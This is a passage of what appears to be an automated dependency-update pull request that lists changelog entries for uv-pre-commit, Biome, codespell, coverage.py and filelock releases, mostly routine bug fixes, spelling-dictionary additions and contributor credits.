Source](https://redirect.github.com/astral-sh/uv-pre-commit/compare/0.11.31...0.11.32)
See: <https://github.com/astral-sh/uv/releases/tag/0.11.32>
###
[`v0.11.31`](https://redirect.github.com/astral-sh/uv-pre-commit/releases/tag/0.11.31)
[Compare
Source](https://redirect.github.com/astral-sh/uv-pre-commit/compare/0.11.30...0.11.31)
See: <https://github.com/astral-sh/uv/releases/tag/0.11.31>
###
[`v0.11.30`](https://redirect.github.com/astral-sh/uv-pre-commit/releases/tag/0.11.30)
[Compare
Source](https://redirect.github.com/astral-sh/uv-pre-commit/compare/0.11.29...0.11.30)
See: <https://github.com/astral-sh/uv/releases/tag/0.11.30>
###
[`v0.11.29`](https://redirect.github.com/astral-sh/uv-pre-commit/releases/tag/0.11.29)
[Compare
Source](https://redirect.github.com/astral-sh/uv-pre-commit/compare/0.11.28...0.11.29)
See: <https://github.com/astral-sh/uv/releases/tag/0.11.29>
###
[`v0.11.28`](https://redirect.github.com/astral-sh/uv-pre-commit/releases/tag/0.11.28)
[Compare
Source](https://redirect.github.com/astral-sh/uv-pre-commit/compare/0.11.27...0.11.28)
See: <https://github.com/astral-sh/uv/releases/tag/0.11.28>
###
[`v0.11.27`](https://redirect.github.com/astral-sh/uv-pre-commit/releases/tag/0.11.27)
[Compare
Source](https://redirect.github.com/astral-sh/uv-pre-commit/compare/0.11.26...0.11.27)
See: <https://github.com/astral-sh/uv/releases/tag/0.11.27>
###
[`v0.11.26`](https://redirect.github.com/astral-sh/uv-pre-commit/releases/tag/0.11.26)
[Compare
Source](https://redirect.github.com/astral-sh/uv-pre-commit/compare/0.11.25...0.11.26)
See: <https://github.com/astral-sh/uv/releases/tag/0.11.26>
###
[`v0.11.25`](https://redirect.github.com/astral-sh/uv-pre-commit/releases/tag/0.11.25)
[Compare
Source](https://redirect.github.com/astral-sh/uv-pre-commit/compare/0.11.24...0.11.25)
See: <https://github.com/astral-sh/uv/releases/tag/0.11.25>
###
[`v0.11.24`](https://redirect.github.com/astral-sh/uv-pre-commit/releases/tag/0.11.24)
[Compare
Source](https://redirect.github.com/astral-sh/uv-pre-commit/compare/0.11.23...0.11.24)
See: <https://github.com/astral-sh/uv/releases/tag/0.11.24>
###
[`v0.11.23`](https://redirect.github.com/astral-sh/uv-pre-commit/releases/tag/0.11.23)
[Compare
Source](https://redirect.github.com/astral-sh/uv-pre-commit/compare/0.11.22...0.11.23)
See: <https://github.com/astral-sh/uv/releases/tag/0.11.23>
###
[`v0.11.22`](https://redirect.github.com/astral-sh/uv-pre-commit/releases/tag/0.11.22)
[Compare
Source](https://redirect.github.com/astral-sh/uv-pre-commit/compare/0.11.21...0.11.22)
See: <https://github.com/astral-sh/uv/releases/tag/0.11.22>
###
[`v0.11.21`](https://redirect.github.com/astral-sh/uv-pre-commit/releases/tag/0.11.21)
[Compare
Source](https://redirect.github.com/astral-sh/uv-pre-commit/compare/0.11.20...0.11.21)
See: <https://github.com/astral-sh/uv/releases/tag/0.11.21>
###
[`v0.11.20`](https://redirect.github.com/astral-sh/uv-pre-commit/releases/tag/0.11.20)
[Compare
Source](https://redirect.github.com/astral-sh/uv-pre-commit/compare/0.11.19...0.11.20)
See: <https://github.com/astral-sh/uv/releases/tag/0.11.20>
</details>
<details>
<summary>biomejs/pre-commit (biomejs/pre-commit)</summary>
###
[`v2.5.5`](https://redirect.github.com/biomejs/pre-commit/compare/v2.5.4...v2.5.5)
[Compare
Source](https://redirect.github.com/biomejs/pre-commit/compare/v2.5.4...v2.5.5)
###
[`v2.5.4`](https://redirect.github.com/biomejs/pre-commit/compare/v2.5.3...v2.5.4)
[Compare
Source](https://redirect.github.com/biomejs/pre-commit/compare/v2.5.3...v2.5.4)
###
[`v2.5.3`](https://redirect.github.com/biomejs/pre-commit/compare/v2.5.2...v2.5.3)
[Compare
Source](https://redirect.github.com/biomejs/pre-commit/compare/v2.5.2...v2.5.3)
###
[`v2.5.2`](https://redirect.github.com/biomejs/pre-commit/compare/v2.5.1...v2.5.2)
[Compare
Source](https://redirect.github.com/biomejs/pre-commit/compare/v2.5.1...v2.5.2)
###
[`v2.5.1`](https://redirect.github.com/biomejs/pre-commit/compare/v2.5.0...v2.5.1)
[Compare
Source](https://redirect.github.com/biomejs/pre-commit/compare/v2.5.0...v2.5.1)
###
[`v2.5.0`](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.16...v2.5.0)
[Compare
Source](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.16...v2.5.0)
</details>
<details>
<summary>codespell-project/codespell (codespell)</summary>
###
[`v2.4.3`](https://redirect.github.com/codespell-project/codespell/releases/tag/v2.4.3)
[Compare
Source](https://redirect.github.com/codespell-project/codespell/compare/v2.4.2...v2.4.3)
<!-- Release notes generated using configuration in .github/release.yml
at main -->
#### What's Changed
- Add 'radback' to dictionary with correction by
[@​Flo3561](https://redirect.github.com/Flo3561) in
[#​3883](https://redirect.github.com/codespell-project/codespell/pull/3883)
- Add 'repetirion' to dictionary corrections by
[@​Flo3561](https://redirect.github.com/Flo3561) in
[#​3885](https://redirect.github.com/codespell-project/codespell/pull/3885)
- Need to specify a version of Python version after all by
[@​DimitriPapadopoulos](https://redirect.github.com/DimitriPapadopoulos)
in
[#​3887](https://redirect.github.com/codespell-project/codespell/pull/3887)
- \[pre-commit.ci] pre-commit autoupdate by
[@​pre-commit-ci](https://redirect.github.com/pre-commit-ci)\[bot]
in
[#​3889](https://redirect.github.com/codespell-project/codespell/pull/3889)
- Add cases for "modulle" -> "module" by
[@​utzcoz](https://redirect.github.com/utzcoz) in
[#​3888](https://redirect.github.com/codespell-project/codespell/pull/3888)
- Add case "auido" -> "audio" by
[@​utzcoz](https://redirect.github.com/utzcoz) in
[#​3890](https://redirect.github.com/codespell-project/codespell/pull/3890)
- Add credentilas->credentials and friends by
[@​peternewman](https://redirect.github.com/peternewman) in
[#​3895](https://redirect.github.com/codespell-project/codespell/pull/3895)
- Add the case "cubid" -> "cubic" by
[@​utzcoz](https://redirect.github.com/utzcoz) in
[#​3891](https://redirect.github.com/codespell-project/codespell/pull/3891)
- \[pre-commit.ci] pre-commit autoupdate by
[@​pre-commit-ci](https://redirect.github.com/pre-commit-ci)\[bot]
in
[#​3897](https://redirect.github.com/codespell-project/codespell/pull/3897)
- \[pre-commit.ci] pre-commit autoupdate by
[@​pre-commit-ci](https://redirect.github.com/pre-commit-ci)\[bot]
in
[#​3900](https://redirect.github.com/codespell-project/codespell/pull/3900)
- Bump codecov/codecov-action from 5 to 6 by
[@​dependabot](https://redirect.github.com/dependabot)\[bot] in
[#​3902](https://redirect.github.com/codespell-project/codespell/pull/3902)
- \[pre-commit.ci] pre-commit autoupdate by
[@​pre-commit-ci](https://redirect.github.com/pre-commit-ci)\[bot]
in
[#​3904](https://redirect.github.com/codespell-project/codespell/pull/3904)
- Add `magntiude->magnitude` by
[@​nathanjmcdougall](https://redirect.github.com/nathanjmcdougall)
in
[#​3899](https://redirect.github.com/codespell-project/codespell/pull/3899)
- \[pre-commit.ci] pre-commit autoupdate by
[@​pre-commit-ci](https://redirect.github.com/pre-commit-ci)\[bot]
in
[#​3909](https://redirect.github.com/codespell-project/codespell/pull/3909)
- \[pre-commit.ci] pre-commit autoupdate by
[@​pre-commit-ci](https://redirect.github.com/pre-commit-ci)\[bot]
in
[#​3912](https://redirect.github.com/codespell-project/codespell/pull/3912)
- Add the case "instanc" -> "instance" by
[@​utzcoz](https://redirect.github.com/utzcoz) in
[#​3896](https://redirect.github.com/codespell-project/codespell/pull/3896)
- gampad -> gamepad (and plural) by
[@​julianstirling](https://redirect.github.com/julianstirling) in
[#​3906](https://redirect.github.com/codespell-project/codespell/pull/3906)
- Add typos of `monotonic` and `monotonicity` by
[@​nathanjmcdougall](https://redirect.github.com/nathanjmcdougall)
in
[#​3898](https://redirect.github.com/codespell-project/codespell/pull/3898)
- Add spelling correction for multipile(s)/vulnerabities. by
[@​cfi-gb](https://redirect.github.com/cfi-gb) in
[#​3905](https://redirect.github.com/codespell-project/codespell/pull/3905)
- Add 'simpilfy -> simplify' by
[@​alexreinking](https://redirect.github.com/alexreinking) in
[#​3913](https://redirect.github.com/codespell-project/codespell/pull/3913)
- fix(packaging): prevent unwanted files and tests from being installed
by
[@​mikelolasagasti](https://redirect.github.com/mikelolasagasti)
in
[#​3911](https://redirect.github.com/codespell-project/codespell/pull/3911)
- Add skarhoj->SKAARHOJ to dictionary corrections by
[@​peternewman](https://redirect.github.com/peternewman) in
[#​3908](https://redirect.github.com/codespell-project/codespell/pull/3908)
- Improve the dictionary by
[@​algonell](https://redirect.github.com/algonell) in
[#​3914](https://redirect.github.com/codespell-project/codespell/pull/3914)
- Add spelling correction for accorss/accors. by
[@​cfi-gb](https://redirect.github.com/cfi-gb) in
[#​3916](https://redirect.github.com/codespell-project/codespell/pull/3916)
- Bump autofix-ci/action from 1.3.3 to 1.3.4 by
[@​dependabot](https://redirect.github.com/dependabot)\[bot] in
[#​3921](https://redirect.github.com/codespell-project/codespell/pull/3921)
- \[pre-commit.ci] pre-commit autoupdate by
[@​pre-commit-ci](https://redirect.github.com/pre-commit-ci)\[bot]
in
[#​3923](https://redirect.github.com/codespell-project/codespell/pull/3923)
- Add `influecer->influencer` and `influnce*` typos to dictionary by
[@​nathanjmcdougall](https://redirect.github.com/nathanjmcdougall)
in
[#​3925](https://redirect.github.com/codespell-project/codespell/pull/3925)
- Add typos for `excavate` and variants by
[@​nathanjmcdougall](https://redirect.github.com/nathanjmcdougall)
in
[#​3926](https://redirect.github.com/codespell-project/codespell/pull/3926)
- Dict: Add corrections for memoy by
[@​mdeweerd](https://redirect.github.com/mdeweerd) in
[#​3924](https://redirect.github.com/codespell-project/codespell/pull/3924)
- `overheda -> overhead` by
[@​George-Ogden](https://redirect.github.com/George-Ogden) in
[#​3919](https://redirect.github.com/codespell-project/codespell/pull/3919)
- `inclusize->inclusive` and variants by
[@​George-Ogden](https://redirect.github.com/George-Ogden) in
[#​3918](https://redirect.github.com/codespell-project/codespell/pull/3918)
- Add spelling corrections for authorization by
[@​cfi-gb](https://redirect.github.com/cfi-gb) in
[#​3922](https://redirect.github.com/codespell-project/codespell/pull/3922)
- \[pre-commit.ci] pre-commit autoupdate by
[@​pre-commit-ci](https://redirect.github.com/pre-commit-ci)\[bot]
in
[#​3927](https://redirect.github.com/codespell-project/codespell/pull/3927)
- Don't fix Voight by
[@​DimitriPapadopoulos](https://redirect.github.com/DimitriPapadopoulos)
in
[#​3929](https://redirect.github.com/codespell-project/codespell/pull/3929)
- Add spelling corrections for interstect and interstection by
[@​korli](https://redirect.github.com/korli) in
[#​3928](https://redirect.github.com/codespell-project/codespell/pull/3928)
- \[pre-commit.ci] pre-commit autoupdate by
[@​pre-commit-ci](https://redirect.github.com/pre-commit-ci)\[bot]
in
[#​3930](https://redirect.github.com/codespell-project/codespell/pull/3930)
- Improve output in interactive mode by
[@​darkmattercoder](https://redirect.github.com/darkmattercoder)
in
[#​3884](https://redirect.github.com/codespell-project/codespell/pull/3884)
- feat: support codespell:ignore-next-line directive by
[@​SAY-5](https://redirect.github.com/SAY-5) in
[#​3931](https://redirect.github.com/codespell-project/codespell/pull/3931)
- Add woork->work and formace->format and friends by
[@​peternewman](https://redirect.github.com/peternewman) in
[#​3828](https://redirect.github.com/codespell-project/codespell/pull/3828)
- shortctu -> shortcut by
[@​George-Ogden](https://redirect.github.com/George-Ogden) in
[#​3934](https://redirect.github.com/codespell-project/codespell/pull/3934)
- A couple typos by
[@​DimitriPapadopoulos](https://redirect.github.com/DimitriPapadopoulos)
in
[#​3935](https://redirect.github.com/codespell-project/codespell/pull/3935)
- \[pre-commit.ci] pre-commit autoupdate by
[@​pre-commit-ci](https://redirect.github.com/pre-commit-ci)\[bot]
in
[#​3937](https://redirect.github.com/codespell-project/codespell/pull/3937)
- \[pre-commit.ci] pre-commit autoupdate by
[@​pre-commit-ci](https://redirect.github.com/pre-commit-ci)\[bot]
in
[#​3942](https://redirect.github.com/codespell-project/codespell/pull/3942)
- reclaculate->recalculate by
[@​adamgann](https://redirect.github.com/adamgann) in
[#​3936](https://redirect.github.com/codespell-project/codespell/pull/3936)
- Add spelling correction for improprt. by
[@​cfi-gb](https://redirect.github.com/cfi-gb) in
[#​3939](https://redirect.github.com/codespell-project/codespell/pull/3939)
- Dictionary plasic-plastic by
[@​julianstirling](https://redirect.github.com/julianstirling) in
[#​3938](https://redirect.github.com/codespell-project/codespell/pull/3938)
- Add rourter->router and friends by
[@​peternewman](https://redirect.github.com/peternewman) in
[#​3943](https://redirect.github.com/codespell-project/codespell/pull/3943)
- Add new spelling correction for 'strucutr' to 'structure' by
[@​Flo3561](https://redirect.github.com/Flo3561) in
[#​3944](https://redirect.github.com/codespell-project/codespell/pull/3944)
- adding zone spelling correction by
[@​Flo3561](https://redirect.github.com/Flo3561) in
[#​3945](https://redirect.github.com/codespell-project/codespell/pull/3945)
- Add correction for 'egineering' to 'engineering' by
[@​Flo3561](https://redirect.github.com/Flo3561) in
[#​3946](https://redirect.github.com/codespell-project/codespell/pull/3946)
- adding seet spelling corrections by
[@​Flo3561](https://redirect.github.com/Flo3561) in
[#​3947](https://redirect.github.com/codespell-project/codespell/pull/3947)
- \[pre-commit.ci] pre-commit autoupdate by
[@​pre-commit-ci](https://redirect.github.com/pre-commit-ci)\[bot]
in
[#​3949](https://redirect.github.com/codespell-project/codespell/pull/3949)
- Add spelling correction for flwa/flwas. by
[@​cfi-gb](https://redirect.github.com/cfi-gb) in
[#​3948](https://redirect.github.com/codespell-project/codespell/pull/3948)
- PEP 735 compliance: dependency groups by
[@​DimitriPapadopoulos](https://redirect.github.com/DimitriPapadopoulos)
in
[#​3877](https://redirect.github.com/codespell-project/codespell/pull/3877)
- Allow use --builtin=all to use every builtin dictionary by
[@​AlightSoulmate](https://redirect.github.com/AlightSoulmate) in
[#​3917](https://redirect.github.com/codespell-project/codespell/pull/3917)
- feat: add --ignore-sic to skip misspellings marked with \[sic] by
[@​kojiromike](https://redirect.github.com/kojiromike) in
[#​3950](https://redirect.github.com/codespell-project/codespell/pull/3950)
- Bump codecov/codecov-action from 6 to 7 by
[@​dependabot](https://redirect.github.com/dependabot)\[bot] in
[#​3953](https://redirect.github.com/codespell-project/codespell/pull/3953)
- \[pre-commit.ci] pre-commit autoupdate by
[@​pre-commit-ci](https://redirect.github.com/pre-commit-ci)\[bot]
in
[#​3954](https://redirect.github.com/codespell-project/codespell/pull/3954)
- Add common misspellings for 'dispplay' variations by
[@​Flo3561](https://redirect.github.com/Flo3561) in
[#​3955](https://redirect.github.com/codespell-project/codespell/pull/3955)
- \[pre-commit.ci] pre-commit autoupdate by
[@​pre-commit-ci](https://redirect.github.com/pre-commit-ci)\[bot]
in
[#​3958](https://redirect.github.com/codespell-project/codespell/pull/3958)
- Add spelling corrections for simpe and variants. by
[@​cfi-gb](https://redirect.github.com/cfi-gb) in
[#​3960](https://redirect.github.com/codespell-project/codespell/pull/3960)
- Bump actions/checkout from 6 to 7 by
[@​dependabot](https://redirect.github.com/dependabot)\[bot] in
[#​3961](https://redirect.github.com/codespell-project/codespell/pull/3961)
- \[pre-commit.ci] pre-commit autoupdate by
[@​pre-commit-ci](https://redirect.github.com/pre-commit-ci)\[bot]
in
[#​3964](https://redirect.github.com/codespell-project/codespell/pull/3964)
- \[pre-commit.ci] pre-commit autoupdate by
[@​pre-commit-ci](https://redirect.github.com/pre-commit-ci)\[bot]
in
[#​3966](https://redirect.github.com/codespell-project/codespell/pull/3966)
- Add common misspellings for reseeve->reserve to dictionary by
[@​peternewman](https://redirect.github.com/peternewman) in
[#​3967](https://redirect.github.com/codespell-project/codespell/pull/3967)
- \[pre-commit.ci] pre-commit autoupdate by
[@​pre-commit-ci](https://redirect.github.com/pre-commit-ci)\[bot]
in
[#​3968](https://redirect.github.com/codespell-project/codespell/pull/3968)
- \[pre-commit.ci] pre-commit autoupdate by
[@​pre-commit-ci](https://redirect.github.com/pre-commit-ci)\[bot]
in
[#​3970](https://redirect.github.com/codespell-project/codespell/pull/3970)
- Read only \[tool.codespell] from TOML config by
[@​Sanjays2402](https://redirect.github.com/Sanjays2402) in
[#​3975](https://redirect.github.com/codespell-project/codespell/pull/3975)
#### New Contributors
- [@​Flo3561](https://redirect.github.com/Flo3561) made their
first contribution in
[#​3883](https://redirect.github.com/codespell-project/codespell/pull/3883)
- [@​alexreinking](https://redirect.github.com/alexreinking) made
their first contribution in
[#​3913](https://redirect.github.com/codespell-project/codespell/pull/3913)
- [@​mikelolasagasti](https://redirect.github.com/mikelolasagasti)
made their first contribution in
[#​3911](https://redirect.github.com/codespell-project/codespell/pull/3911)
- [@​korli](https://redirect.github.com/korli) made their first
contribution in
[#​3928](https://redirect.github.com/codespell-project/codespell/pull/3928)
- [@​darkmattercoder](https://redirect.github.com/darkmattercoder)
made their first contribution in
[#​3884](https://redirect.github.com/codespell-project/codespell/pull/3884)
- [@​SAY-5](https://redirect.github.com/SAY-5) made their first
contribution in
[#​3931](https://redirect.github.com/codespell-project/codespell/pull/3931)
- [@​adamgann](https://redirect.github.com/adamgann) made their
first contribution in
[#​3936](https://redirect.github.com/codespell-project/codespell/pull/3936)
- [@​AlightSoulmate](https://redirect.github.com/AlightSoulmate)
made their first contribution in
[#​3917](https://redirect.github.com/codespell-project/codespell/pull/3917)
- [@​kojiromike](https://redirect.github.com/kojiromike) made
their first contribution in
[#​3950](https://redirect.github.com/codespell-project/codespell/pull/3950)
- [@​Sanjays2402](https://redirect.github.com/Sanjays2402) made
their first contribution in
[#​3975](https://redirect.github.com/codespell-project/codespell/pull/3975)
**Full Changelog**:
<https://github.com/codespell-project/codespell/compare/v2.4.2...v2.4.3>
</details>
<details>
<summary>coveragepy/coveragepy (coverage)</summary>
###
[`v7.15.2`](https://redirect.github.com/coveragepy/coveragepy/blob/HEAD/CHANGES.rst#Version-7152--2026-07-15)
[Compare
Source](https://redirect.github.com/coveragepy/coveragepy/compare/7.15.1...7.15.2)
- Fix: one of the performance improvements in 7.15.1 (pull 2215)
dramatically
increased memory use during reporting for large projects. Now we use a
different approach that is both faster and slimmer than 7.15.0. Fixes
`issue
2229`\_.
.. \_issue 2229:
[#​2229](https://redirect.github.com/coveragepy/coveragepy/issues/2229)
.. \_changes\_7-15-1:
</details>
<details>
<summary>tox-dev/py-filelock (filelock)</summary>
###
[`v3.32.0`](https://redirect.github.com/tox-dev/filelock/releases/tag/3.32.0)
[Compare
Source](https://redirect.github.com/tox-dev/py-filelock/compare/3.31.2...3.32.0)
<!-- Release notes generated using configuration in .github/release.yaml
at 3.32.0 -->
##### What's Changed
- 👷 ci: add Python 3.15 to the test matrix by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[tox-dev/filelock#683](https://redirect.github.com/tox-dev/filelock/pull/683)
- 🐛 fix(packaging): let an unpacked sdist run the test suite by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[tox-dev/filelock#685](https://redirect.github.com/tox-dev/filelock/pull/685)
**Full Changelog**:
<https://github.com/tox-dev/filelock/compare/3.31.2...3.32.0>
###
[`v3.31.2`](https://redirect.github.com/tox-dev/filelock/releases/tag/3.31.2)
[Compare
Source](https://redirect.github.com/tox-dev/py-filelock/compare/3.31.1...3.31.2)
<!-- Release notes generated using configuration in .github/release.yaml
at 3.31.2 -->
##### What's Changed
- 🐛 fix(strict): tolerate an errno without ENOTSUP by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[tox-dev/filelock#681](https://redirect.github.com/tox-dev/filelock/pull/681)
**Full Changelog**:
<https://github.com/tox-dev/filelock/compare/3.31.1...3.31.2>
###
[`v3.31.1`](https://redirect.github.com/tox-dev/filelock/releases/tag/3.31.1)
[Compare
Source](https://redirect.github.com/tox-dev/py-filelock/compare/3.31.0...3.31.1)
<!-- Release notes generated using configuration in .github/release.yaml
at 3.31.1 -->
##### What's Changed
- ♻️ refactor(coverage): key exclusions on probed capability by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[tox-dev/filelock#679](https://redirect.github.com/tox-dev/filelock/pull/679)
- scope a lease's claim to the context that acquired it by
[@​dxbjavid](https://redirect.github.com/dxbjavid) in
[tox-dev/filelock#680](https://redirect.github.com/tox-dev/filelock/pull/680)
**Full Changelog**:
<https://github.com/tox-dev/filelock/compare/3.31.0...3.31.1>
###
[`v3.31.0`](https://redirect.github.com/tox-dev/filelock/releases/tag/3.31.0)
[Compare
Source](https://redirect.github.com/tox-dev/py-filelock/compare/3.30.3...3.31.0)
<!-- Release notes generated using configuration in .github/release.yaml
at 3.31.0 -->
#### What's Changed
- ✨ feat(platform): support Termux/Android by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[tox-dev/filelock#678](https://redirect.github.com/tox-dev/filelock/pull/678)
**Full Changelog**:
<https://github.com/tox-dev/filelock/compare/3.30.3...3.31.0>
###
[`v3.30.3`](https://redirect.github.com/tox-dev/filelock/releases/tag/3.30.3)
[Compare
Source](https://redirect.github.com/tox-dev/py-filelock/compare/3.30.2...3.30.3)
<!-- Release notes generated using configuration in .github/release.yaml
at 3.30.3 -->
#### What's Changed
- Keep both tables of contents on screen at any browser font size by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[tox-dev/filelock#673](https://redirect.github.com/tox-dev/filelock/pull/673)
- 📝 docs(mermaid): follow the light and dark theme toggle by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[tox-dev/filelock#674](https://redirect.github.com/tox-dev/filelock/pull/674)
- asyncio: scope the reentrant-deadlock registry to the owning task by
[@​xt-yin](https://redirect.github.com/xt-yin) in
[tox-dev/filelock#676](https://redirect.github.com/tox-dev/filelock/pull/676)
#### New Contributors
- [@​xt-yin](https://redirect.github.com/xt-yin) made their first
contribution in
[tox-dev/filelock#676](https://redirect.github.com/tox-dev/filelock/pull/676)
**Full Changelog**:
<https://github.com/tox-dev/filelock/compare/3.30.2...3.30.3>
###
[`v3.30.2`](https://redirect.github.com/tox-dev/filelock/releases/tag/3.30.2)
[Compare
Source](https://redirect.github.com/tox-dev/py-filelock/compare/3.30.1...3.30.2)
<!-- Release notes generated using configuration in .github/release.yaml
at 3.30.2 -->
#### What's Changed
- Document every lock type, and stop evicting a marker we cannot read by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[tox-dev/filelock#672](https://redirect.github.com/tox-dev/filelock/pull/672)
**Full Changelog**:
<https://github.com/tox-dev/filelock/compare/3.30.1...3.30.2>
###
[`v3.30.1`](https://redirect.github.com/tox-dev/filelock/releases/tag/3.30.1)
[Compare
Source](https://redirect.github.com/tox-dev/py-filelock/compare/3.30.0...3.30.1)
<!-- Release notes generated using configuration in .github/release.yaml
at 3.30.1 -->
#### What's Changed
- 📝 docs: separate changelog releases with a blank line by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[tox-dev/filelock#668](https://redirect.github.com/tox-dev/filelock/pull/668)
- 🐛 fix: tolerate NFSv3 stale handle in strict claim read by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[tox-dev/filelock#669](https://redirect.github.com/tox-dev/filelock/pull/669)
- Match fork-reset protocol on the class object by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[tox-dev/filelock#671](https://redirect.github.com/tox-dev/filelock/pull/671)
- reject non-finite lease duration in marker records by
[@​dxbjavid](https://redirect.github.com/dxbjavid) in
[tox-dev/filelock#670](https://redirect.github.com/tox-dev/filelock/pull/670)
**Full Changelog**:
<https://github.com/tox-dev/filelock/compare/3.30.0...3.30.1>
###
[`v3.30.0`](https://redirect.github.com/tox-dev/filelock/releases/tag/3.30.0)
[Compare
Source](https://redirect.github.com/tox-dev/py-filelock/compare/3.29.7...3.30.0)
<!-- Release notes generated using configuration in .github/release.yaml
at 3.30.0 -->
#### What's Changed
- 🎨 style: readability cleanup across the library by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[tox-dev/filelock#598](https://redirect.github.com/tox-dev/filelock/pull/598)
- 🐛 fix(api): ignore lifetime on native OS locks by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[tox-dev/filelock#593](https://redirect.github.com/tox-dev/filelock/pull/593)
- 🐛 fix(unix): don't mutate lock file before acquiring flock by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[tox-dev/filelock#594](https://redirect.github.com/tox-dev/filelock/pull/594)
- soft: evict a non-regular lock file without reading it by
[@​dxbjavid](https://redirect.github.com/dxbjavid) in
[tox-dev/filelock#597](https://redirect.github.com/tox-dev/filelock/pull/597)
- 🐛 fix(windows): bind reparse-point check to the locked handle by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[tox-dev/filelock#596](https://redirect.github.com/tox-dev/filelock/pull/596)
- 🐛 fix(api): make native lock release transactional by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[tox-dev/filelock#615](https://redirect.github.com/tox-dev/filelock/pull/615)
- 🐛 fix(soft): make marker writes and cleanup transactional by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[tox-dev/filelock#614](https://redirect.github.com/tox-dev/filelock/pull/614)
- 🐛 fix(windows): open the lock file through NtCreateFile by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[tox-dev/filelock#617](https://redirect.github.com/tox-dev/filelock/pull/617)
- ✨ feat(api): add context\_error\_policy for dual context failures by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[tox-dev/filelock#618](https://redirect.github.com/tox-dev/filelock/pull/618)
- 📝 docs: correct Unix lock-file cleanup and flock claims by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[tox-dev/filelock#623](https://redirect.github.com/tox-dev/filelock/pull/623)
- ✨ feat(api): add close\_error\_policy for post-unlock close errors by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[tox-dev/filelock#619](https://redirect.github.com/tox-dev/filelock/pull/619)
- 🐛 fix(api): canonicalize singleton keys without following a final
symlink by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[tox-dev/filelock#621](https://redirect.github.com/tox-dev/filelock/pull/621)
- ✨ feat(unix): add fallback\_to\_soft opt-out for native locks by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[tox-dev/filelock#622](https://redirect.github.com/tox-dev/filelock/pull/622)
- ✨ feat: add lock\_descriptor for a caller-owned descriptor by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[tox-dev/filelock#620](https://redirect.github.com/tox-dev/filelock/pull/620)
- ✨ feat(api): add preserve\_lock\_file to keep the lock pathname by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[tox-dev/filelock#624](https://redirect.github.com/tox-dev/filelock/pull/624)
- ✨ feat(api): add on\_acquired post-acquisition hook by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[tox-dev/filelock#625](https://redirect.github.com/tox-dev/filelock/pull/625)
- 🔧 build(release): towncrier changelog pipeline, backfill, and docs by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[tox-dev/filelock#626](https://redirect.github.com/tox-dev/filelock/pull/626)
- 📝 docs: drop bot entries and link code refs in the changelog by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[tox-dev/filelock#638](https://redirect.github.com/tox-dev/filelock/pull/638)
- 🐛 fix(api): validate lifetime values by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[tox-dev/filelock#644](https://redirect.github.com/tox-dev/filelock/pull/644)
- 🐛 fix(win32): capture process probe errors by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[tox-dev/filelock#645](https://redirect.github.com/tox-dev/filelock/pull/645)
- 🐛 fix(api): reject dropped lock options by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[tox-dev/filelock#646](https://redirect.github.com/tox-dev/filelock/pull/646)
- 🐛 fix(api): retain acquisition path identity by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[tox-dev/filelock#647](https://redirect.github.com/tox-dev/filelock/pull/647)
- 🐛 fix(api): detach grouped release errors by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[tox-dev/filelock#648](https://redirect.github.com/tox-dev/filelock/pull/648)
- 🐛 fix(descriptor): define unavailable behavior by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[tox-dev/filelock#650](https://redirect.github.com/tox-dev/filelock/pull/650)
- 🐛 fix(ci): map absolute coverage paths by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[tox-dev/filelock#651](https://redirect.github.com/tox-dev/filelock/pull/651)
- 🐛 fix(soft): relinquish fd before close by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[tox-dev/filelock#649](https://redirect.github.com/tox-dev/filelock/pull/649)
- 🐛 fix(async): make cancellation atomic by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[tox-dev/filelock#652](https://redirect.github.com/tox-dev/filelock/pull/652)
- 🐛 fix(sqlite): isolate forked connections by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[tox-dev/filelock#657](https://redirect.github.com/tox-dev/filelock/pull/657)
- 🧪 test(conftest): scope the close mock to one descriptor by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[tox-dev/filelock#656](https://redirect.github.com/tox-dev/filelock/pull/656)
- ✨ feat(soft): add strict soft locks and leases by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[tox-dev/filelock#658](https://redirect.github.com/tox-dev/filelock/pull/658)
- ✨ feat(strict): replace shared markers with owner claims by
